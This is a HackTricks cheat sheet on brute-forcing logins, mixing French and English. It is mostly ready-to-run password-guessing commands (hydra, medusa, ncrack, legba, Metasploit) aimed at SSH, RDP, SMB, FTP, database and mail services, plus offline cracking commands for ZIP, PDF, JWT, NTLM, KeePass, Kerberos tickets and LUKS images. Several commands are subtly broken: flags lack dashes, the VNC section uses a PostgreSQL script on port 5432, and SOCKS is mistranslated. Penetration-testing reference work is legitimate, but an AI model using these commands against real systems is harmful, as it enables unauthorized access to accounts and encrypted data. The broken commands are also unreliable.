hacktricks/generic-methodologies-and-resources/brute-force.md

49 KiB
Raw Blame History

Brute Force - Fiche de triche


Utilisez Trickest pour construire facilement et automatiser des workflows alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui à :

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert de l'équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks :

Identifiants par défaut

Recherchez dans Google les identifiants par défaut de la technologie utilisée, ou essayez ces liens :

Créez vos propres dictionnaires

Trouvez autant d'informations que possible sur la cible et générez un dictionnaire personnalisé. Outils qui peuvent aider :

Crunch

crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)

@ Lower case alpha characters
, Upper case alpha characters
% Numeric characters
^ Special characters including spac
crunch 6 8 -t ,@@^^%%

Cewl

Cewl est un outil qui extrait les mots d'un site Web pour générer une liste de mots potentiels à utiliser dans des attaques de force brute.

cewl example.com -m 5 -w words.txt

CUPP

Générer des mots de passe basés sur vos connaissances de la victime (noms, dates...)

python3 cupp.py -h

Wister

Un outil générateur de listes de mots, qui vous permet de fournir un ensemble de mots, vous donnant la possibilité de créer de multiples variations à partir des mots donnés, créant ainsi une liste de mots unique et idéale à utiliser pour un cible spécifique.

python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst

__          _______  _____ _______ ______ _____
\ \        / /_   _|/ ____|__   __|  ____|  __ \
\ \  /\  / /  | | | (___    | |  | |__  | |__) |
\ \/  \/ /   | |  \___ \   | |  |  __| |  _  /
\  /\  /   _| |_ ____) |  | |  | |____| | \ \
\/  \/   |_____|_____/   |_|  |______|_|  \_\

Version 1.0.3                    Cycurity

Generating wordlist...
[########################################] 100%
Generated 67885 lines.

Finished in 0.920s.

pydictor

Listes de mots


Utilisez Trickest pour construire facilement et automatiser des workflows alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui :

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Services

Classés par ordre alphabétique du nom du service.

AFP

nmap -p 548 --script afp-brute <IP>
msf> use auxiliary/scanner/afp/afp_login
msf> set BLANK_PASSWORDS true
msf> set USER_AS_PASS true
msf> set PASS_FILE <PATH_PASSWDS>
msf> set USER_FILE <PATH_USERS>
msf> run

AJP

AJP (Apache JServ Protocol) is a binary protocol that can be brute-forced to gain unauthorized access to Apache Tomcat servers.

nmap --script ajp-brute -p 8009 <IP>

AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace)

legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl]

Cassandra

Cassandra is a distributed NoSQL database that can be targeted using brute force attacks. These attacks involve trying all possible combinations of usernames and passwords until the correct one is found. It is important to use strong and unique passwords to protect Cassandra databases from brute force attacks.

nmap --script cassandra-brute -p 9160 <IP>
# legba ScyllaDB / Apache Casandra
legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042

CouchDB

Brute Force

Brute force attacks against CouchDB typically involve trying to guess the password for the admin user account. This can be done using tools like Hydra or by writing custom scripts. It is important to use strong and complex passwords to prevent successful brute force attacks.

msf> use auxiliary/scanner/couchdb/couchdb_login
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /

Registre Docker

hydra -L /usr/share/brutex/wordlists/simple-users.txt  -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/

Elasticsearch

Elasticsearch

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /

FTP

Brute Force

Brute force attacks against FTP servers involve attempting to log in using a large number of username and password combinations. This can be done using automated tools that systematically try different combinations until the correct one is found. It is important to note that brute force attacks can be time-consuming and may trigger account lockouts or other security measures.

hydra -l root -P passwords.txt [-t 32] <IP> ftp
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
legba ftp --username admin --password wordlists/passwords.txt --target localhost:21

Brute Force Générique HTTP

WFuzz

Authentification de base HTTP

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
# Use https-get mode for https
medusa -h <IP> -u <username> -P  <passwords.txt> -M  http -m DIR:/path/to/auth -T 10
legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/

HTTP - NTLM

Brute Force

Brute force attacks against NTLM authentication involve attempting all possible combinations of characters until the correct password is found. This method can be time-consuming but is effective against weak passwords. Tools like Hydra can be used to automate the brute force process.

legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/

HTTP - Poster un formulaire

Brute Force

La méthode la plus simple pour casser un mot de passe est le brute force. Cela implique d'essayer toutes les combinaisons possibles de mots de passe jusqu'à ce que le bon soit trouvé. Il existe des outils automatisés qui peuvent aider à effectuer cette tâche de manière efficace.

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb  http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for https

Pour https vous devez changer de "http-post-form" à "https-post-form"

HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle

cmsmap -f W/J/D/M -u a -p a https://wordpress.com
# Check also https://github.com/evilsocket/legba/wiki/HTTP

IMAP

Brute Force

Brute force attacks against IMAP are typically carried out using the hydra tool. The following command can be used to launch a brute force attack against an IMAP server:

hydra -l <username> -P <wordlist> -f <target_ip> imap
  • -l: Specify the username to attack.
  • -P: Specify the wordlist containing passwords to try.
  • -f: Stop the attack once the correct password is found.
  • <target_ip>: The IP address of the target IMAP server.

It is important to note that brute force attacks can be detected by intrusion detection systems (IDS) and can potentially lead to account lockouts.

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
nmap -sV --script imap-brute -p <PORT> <IP>
legba imap --username user --password data/passwords.txt --target localhost:993

IRC

Brute Force

Brute force attacks on IRC servers are usually performed using automated scripts that attempt to guess usernames and passwords. These scripts can be easily found online and are relatively simple to use. Attackers can target both the server login and individual user accounts.

Protection

To protect against brute force attacks on IRC servers, it is recommended to:

  1. Use Strong Passwords: Encourage users to use strong, unique passwords that are not easily guessable.
  2. Implement Account Lockout Policies: Limit the number of login attempts before locking out an account temporarily.
  3. Monitor Login Attempts: Keep track of failed login attempts and investigate any suspicious activity.
  4. Update Software: Ensure that the IRC server software is up to date with the latest security patches.
  5. Use CAPTCHA: Implement CAPTCHA challenges to prevent automated scripts from performing brute force attacks.
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>

ISCSI

ISCSI

nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>

JWT

JWT

#hashcat
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt

#https://github.com/Sjord/jwtcrack
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt

#John
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256

#https://github.com/ticarpi/jwt_tool
python3 jwt_tool.py -d wordlists.txt <JWT token>

#https://github.com/brendan-rius/c-jwt-cracker
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8

#https://github.com/mazen160/jwt-pwn
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt

#https://github.com/lmammino/jwt-cracker
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6

LDAP

LDAP

nmap --script ldap-brute -p 389 <IP>
legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-match

MQTT

MQTT

ncrack mqtt://127.0.0.1 --user test P /root/Desktop/pass.txt -v
legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt

Mongo

nmap -sV --script mongodb-brute -n -p 27017 <IP>
use auxiliary/scanner/mongodb/mongodb_login
legba mongodb --target localhost:27017 --username root --password data/passwords.txt

MSSQL

MSSQL

legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433

MySQL

MySQL

# hydra
hydra -L usernames.txt -P pass.txt <IP> mysql

# msfconsole
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false

# medusa
medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql

#Legba
legba mysql --username root --password wordlists/passwords.txt --target localhost:3306

OracleSQL

Brute Force

Brute force attacks are commonly used to crack passwords by systematically trying all possible combinations until the correct one is found. In OracleSQL, tools like Hydra or Medusa can be used to automate the process of brute forcing passwords. These tools can be configured to try different combinations of usernames and passwords against an Oracle database login page. It is important to note that brute force attacks can be time-consuming and resource-intensive, but they can be effective if the passwords are weak or easily guessable.

patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017

./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt

#msf1
msf> use admin/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>

#msf2, this option uses nmap and it fails sometimes for some reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORTS 1521
msf> set SID <SID>

#for some reason nmap fails sometimes when executing this script
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>

legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt

Pour utiliser oracle_login avec patator, vous devez installer:

pip3 install cx_Oracle --upgrade

Bruteforce de hachage OracleSQL hors ligne (versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, et 11.2.0.3) :

nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30

POP


Brute forcing POP (Post Office Protocol) is a technique used to gain unauthorized access to email accounts by trying various username and password combinations until the correct one is found.

Tools

  • Hydra
  • Nmap
  • Metasploit

Methodology

  1. Identify the POP service running on the target system using Nmap.
  2. Use Hydra to perform a brute force attack by specifying the target IP, protocol (pop3), username list, password list, and any other relevant options.
  3. Monitor the Hydra output to identify successful login credentials.
  4. Once valid credentials are found, access the email account using a mail client or other appropriate tools.
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V

# Insecure
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:110

# SSL
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:995 --pop3-ssl

PostgreSQL

Brute Force

Brute force attacks against PostgreSQL databases can be carried out using tools like Hydra or Metasploit. These tools can attempt to log in to a PostgreSQL database by trying a large number of possible usernames and passwords until the correct combination is found. It is important to use strong and unique passwords to protect against brute force attacks.

hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt <IP> postgres
medusa -h <IP> U /root/Desktop/user.txt P /root/Desktop/pass.txt M postgres
ncrack v U /root/Desktop/user.txt P /root/Desktop/pass.txt <IP>:5432
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432

PPTP

Vous pouvez télécharger le paquet .deb à installer depuis https://http.kali.org/pool/main/t/thc-pptp-bruter/

sudo dpkg -i thc-pptp-bruter*.deb #Install the package
cat rockyou.txt | thc-pptp-bruter u <Username> <IP>

RDP

Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. RDP is commonly used for remote access to Windows servers and desktops.

RDP

Le protocole Remote Desktop (RDP) est un protocole propriétaire développé par Microsoft, qui fournit à un utilisateur une interface graphique pour se connecter à un autre ordinateur via une connexion réseau. RDP est couramment utilisé pour l'accès à distance aux serveurs et postes de travail Windows.

ncrack -vv --user <User> -P pwds.txt rdp://<IP>
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
legba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain <RDP_DOMAIN>] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon]

Redis

Redis (Remote Dictionary Server) est un système de stockage de données en mémoire open source, utilisé comme base de données, cache et courtier de messages. Il prend en charge divers types de structures de données telles que les chaînes, les listes, les ensembles, les ensembles ordonnés, les hachages, les bitmaps, les hyperloglogs et les index géospatiaux avec des requêtes de rayon. Redis est souvent utilisé pour des applications nécessitant une latence extrêmement faible, des performances élevées et une scalabilité élevée.

msf> use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379 <IP>
hydra P /path/pass.txt redis://<IP>:<PORT> # 6379 is the default
legba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl]

Rexec

Rexec

hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V

Rlogin


Brute Force

Brute force attacks against the rlogin service involve attempting to log in by systematically trying all possible passwords until the correct one is found. This method is typically used when other avenues of access have been exhausted. It is important to note that brute force attacks can be time-consuming and resource-intensive, but they can be effective if the password is weak or easily guessable.


Resources

  • Tool: Hydra
  • Tool: Medusa
  • Tool: Ncrack

hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V

Rsh


Brute Force

Brute force attacks consist of systematically checking all possible keys or passwords until the correct one is found. This method is usually used when the key space is small enough to be searched exhaustively. Brute force attacks can be time-consuming but are almost always successful if given enough time.

Tools
  • Hydra
  • Medusa
  • Ncrack
Techniques
  • Dictionary Attack
  • Hybrid Attack
  • Rainbow Table Attack
hydra -L <Username_list> rsh://<Victim_IP> -v -V

http://pentestmonkey.net/tools/misc/rsh-grind

Rsync

nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>

RTSP

RTSP

hydra -l root -P passwords.txt <IP> rtsp

SFTP

Brute Force

Brute force attacks against SFTP servers involve attempting to log in by systematically trying different username and password combinations until the correct one is found. This method is time-consuming but can be effective if the credentials are weak. Tools like Hydra and Medusa can be used to automate the process. It is important to note that brute force attacks are illegal and should only be performed on systems that you have permission to test.

legba sftp --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22

SNMP

SNMP

msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp

SMB

SMB

SMB (Server Message Block) is a protocol for sharing resources, such as files and printers, over a network. It is widely used in Windows networks. Brute-forcing SMB involves trying to guess usernames and passwords to gain unauthorized access to shared resources. This can be done using tools like Hydra or Metasploit.

nmap --script smb-brute -p 445 <IP>
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
legba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup <SMB_WORKGROUP>] [--smb-share <SMB_SHARE>]

SMTP

SMTP (Simple Mail Transfer Protocol) is a communication protocol for email transmission. It is widely used for sending emails over the Internet.

Brute Force Attack

A brute force attack is a trial-and-error method used to obtain information such as a user password or personal identification number (PIN). In a brute force attack, automated software is used to generate a large number of consecutive guesses as to the value of the desired data.

hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
legba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism <mech>]

SOCKS

CHAUSSETTES

nmap  -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt
# With alternative address
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080

SQL Server

Brute Force

Brute force attacks against SQL Server involve attempting to guess usernames and passwords to gain unauthorized access. This can be done using automated tools that systematically try all possible combinations of usernames and passwords until the correct one is found.

Protection

To protect against brute force attacks on SQL Server, consider implementing the following measures:

  1. Strong Password Policy: Enforce the use of complex passwords that are difficult to guess.
  2. Account Lockout Policy: Implement account lockout mechanisms to lock out users after a certain number of failed login attempts.
  3. Monitoring and Logging: Monitor login attempts and set up alerts for multiple failed login attempts.
  4. Two-Factor Authentication: Implement two-factor authentication to add an extra layer of security.
  5. Firewall Rules: Restrict access to SQL Server by allowing only specific IP addresses or ranges.
  6. Regular Security Audits: Conduct regular security audits to identify and address any vulnerabilities.

By implementing these measures, you can significantly reduce the risk of a successful brute force attack on your SQL Server.

#Use the NetBIOS name of the machine as domain
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> U /root/Desktop/user.txt P /root/Desktop/pass.txt M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT

SSH

SSH

hydra -l root -P passwords.txt [-t 32] <IP> ssh
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
legba ssh --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22

Clés SSH faibles / PRNG prévisible de Debian

Certains systèmes présentent des failles connues dans la graine aléatoire utilisée pour générer du matériel cryptographique. Cela peut entraîner une réduction drastique de l'espace des clés qui peut être brute-forcé avec des outils tels que snowdroppe/ssh-keybrute. Des ensembles de clés faibles pré-générées sont également disponibles, comme g0tmi1k/debian-ssh.

STOMP (ActiveMQ, RabbitMQ, HornetQ et OpenMQ)

Le protocole textuel STOMP est un protocole de messagerie largement utilisé qui permet une communication et une interaction transparentes avec des services de file d'attente de messages populaires tels que RabbitMQ, ActiveMQ, HornetQ et OpenMQ. Il offre une approche normalisée et efficace pour échanger des messages et effectuer diverses opérations de messagerie.

legba stomp --target localhost:61613 --username admin --password data/passwords.txt

Telnet

Telnet est un protocole de communication utilisé pour se connecter à des appareils distants. Il est souvent utilisé pour l'administration à distance des appareils réseau. Les attaquants peuvent utiliser des attaques de force brute pour deviner les identifiants de connexion et accéder illégalement à des systèmes via Telnet.

hydra -l root -P passwords.txt [-t 32] <IP> telnet
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet

legba telnet \
--username admin \
--password wordlists/passwords.txt \
--target localhost:23 \
--telnet-user-prompt "login: " \
--telnet-pass-prompt "Password: " \
--telnet-prompt ":~$ " \
--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin

VNC

VNC

hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt -s <PORT> <IP> vnc
medusa -h <IP> u root -P /root/Desktop/pass.txt M vnc
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt t 1 x retry:fgep!='Authentication failure' --max-retries 0 x quit:code=0
use auxiliary/scanner/vnc/vnc_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
legba vnc --target localhost:5901 --password data/passwords.txt

#Metasploit
use auxiliary/scanner/vnc/vnc_login
set RHOSTS <ip>
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst

Winrm

Winrm (Windows Remote Management) est un protocole de gestion à distance utilisé pour l'administration des systèmes Windows.

crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt


Utilisez Trickest pour construire facilement et automatiser des workflows alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui :

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Local

Bases de données de craquage en ligne

Consultez ceci avant d'essayer de faire une attaque par force brute sur un Hash.

ZIP

#sudo apt-get install fcrackzip
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip
zip2john file.zip > zip.john
john zip.john
#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack

Attaque par force brute de texte en clair connu

Vous devez connaître le texte en clair (ou une partie du texte en clair) d'un fichier contenu à l'intérieur du zip chiffré. Vous pouvez vérifier les noms de fichiers et la taille des fichiers contenus à l'intérieur d'un zip chiffré en exécutant : 7z l encrypted.zip
Téléchargez bkcrack depuis la page des versions.

# You need to create a zip file containing only the file that is inside the encrypted zip
zip plaintext.zip plaintext.file

./bkcrack -C <encrypted.zip> -c <plaintext.file> -P <plaintext.zip> -p <plaintext.file>
# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18
# With that key you can create a new zip file with the content of encrypted.zip
# but with a different pass that you set (so you can decrypt it)
./bkcrack -C <encrypted.zip> -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
unzip unlocked.zip #User new_pwd as password

7z

7z

cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
#Download and install requirements for 7z2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john

PDF

Brute Force

Brute force attacks consist of systematically checking all possible keys or passwords until the correct one is found. This method is time-consuming but effective, especially against weak passwords.

Protection

To protect against brute force attacks, use strong and complex passwords, implement account lockout policies after a certain number of failed login attempts, and use multi-factor authentication.

apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
#pdf2john didn't work well, john didn't know which hash type was
# To permanently decrypt the pdf
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf

Mot de passe propriétaire PDF

Pour craquer un mot de passe propriétaire PDF, consultez ceci : https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/

JWT

git clone https://github.com/Sjord/jwtcrack.git
cd jwtcrack

#Bruteforce using crackjwt.py
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt

#Bruteforce using john
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john #It does not work with Kali-John

Craquage NTLM

Format:USUARIO:ID:HASH_LM:HASH_NT:::
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot

Keepass

sudo apt-get install -y kpcli #Install keepass tools like keepass2john
keepass2john file.kdbx > hash #The keepass is only using password
keepass2john -k <file-password> file.kdbx > hash # The keepass is also using a file as a needed credential
#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john
john --wordlist=/usr/share/wordlists/rockyou.txt hash

Keberoasting

Keberoasting est une technique d'attaque qui cible les services Kerberos pour extraire des informations sensibles à partir des tickets de service.

john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

Image Lucks

Méthode 1

Installer : https://github.com/glv2/bruteforce-luks

bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt

Méthode 2

cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
hashcat -m 14600 -a 0 luckshash  wordlists/rockyou.txt
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt

Un autre tutoriel de BF Luks : http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1

Mysql

#John hash format
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d

Clé privée PGP/GPG

gpg2john private_pgp.key #This will generate the hash and save it in a file
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash

Cisco

Clé maître DPAPI

Utilisez https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py puis john

Colonne protégée par mot de passe Open Office

Si vous avez un fichier xlsx avec une colonne protégée par un mot de passe, vous pouvez la déprotéger :

  • Téléchargez-le sur Google Drive et le mot de passe sera automatiquement supprimé
  • Pour le supprimer manuellement :
unzip file.xlsx
grep -R "sheetProtection" ./*
# Find something like: <sheetProtection algorithmName="SHA-512"
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
# Remove that line and rezip the file
zip -r file.xls .

Certificats PFX

# From https://github.com/Ridter/p12tool
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
# From https://github.com/crackpkcs12/crackpkcs12
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx


Utilisez Trickest pour construire facilement et automatiser des workflows alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui :

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Outils

Exemples de hash : https://openwall.info/wiki/john/sample-hashes

Identification de hash

hash-identifier
> <HASH>

Listes de mots

Outils de génération de listes de mots

  • kwprocessor: Générateur avancé de séquences de touches avec des caractères de base configurables, une disposition de touches et des itinéraires.
kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt

Mutation de John

Lisez /etc/john/john.conf et configurez-le

john --wordlist=words.txt --rules --stdout > w_mutated.txt
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules

Hashcat

Attaques Hashcat

  • Attaque par liste de mots (-a 0) avec des règles

Hashcat est déjà livré avec un dossier contenant des règles mais vous pouvez trouver d'autres règles intéressantes ici.

hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
  • Attaque de combinaison de listes de mots

Il est possible de combiner 2 listes de mots en 1 avec hashcat.
Si la liste 1 contenait le mot "hello" et que la seconde contenait 2 lignes avec les mots "world" et "earth". Les mots helloworld et helloearth seront générés.

